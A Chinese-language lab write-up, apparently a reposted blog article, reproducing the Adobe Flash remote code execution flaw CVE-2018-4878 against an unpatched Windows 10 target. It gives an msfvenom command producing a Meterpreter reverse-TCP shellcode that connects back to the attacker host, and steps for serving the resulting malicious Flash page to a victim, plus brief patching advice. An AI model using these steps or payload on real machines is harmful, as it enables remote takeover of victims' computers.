Adboe Flash遠程代碼執行_CVE-2018-4878漏洞復現


Adboe Flash遠程代碼執行_CVE-2018-4878漏洞復現

一、漏洞描述

該漏洞可針對windows用戶發起定向攻擊。攻擊者可以誘導用戶打開包含惡意Flash代碼文件的Microsoft Office文檔、網頁、垃圾電子郵件等。

二、漏洞影響版本

Flash Player版本28.0.0.137以及之前的所有版本

  

三、漏洞復現環境搭建

攻擊機:kali   ip:192.168.10.136

靶機:win10   ie默認集成flash,沒有升級

四、漏洞復現

1.github下載exp, https://github.com/anbai-inc/CVE-2018-4878

2.修改exp

2.1修改shellcode為自己生成的反彈連接shellcode,首先先生成反彈連接shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.136 lport=8888 -f python >/root/shellcode.txt

  

2.2用生成的shellcode替換exp中對應的shellcode

  

2.3修改exp中生成文件保存的路徑

  

3.運行python腳本,會生成兩個文件, exploit.swf和index.html

4.把exploit.swf和index.html復制到/var/www/html,然后開啟web服務, 此時,Kali Linux上Web服務啟動,並且具備index.html這個頁面。只要靶機啟用flash並訪問了這個頁面,則可以直接被控制

5.kali 開啟監聽

  

6.靶機訪問http://192.168.10.136/index.html

  

7.此時kali端已經獲取到會話

  

五、漏洞防御

1.下載最新版本的Adobe Flash

2.安裝常見殺毒軟件,開啟實時防護和殺毒引擎實時升級


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM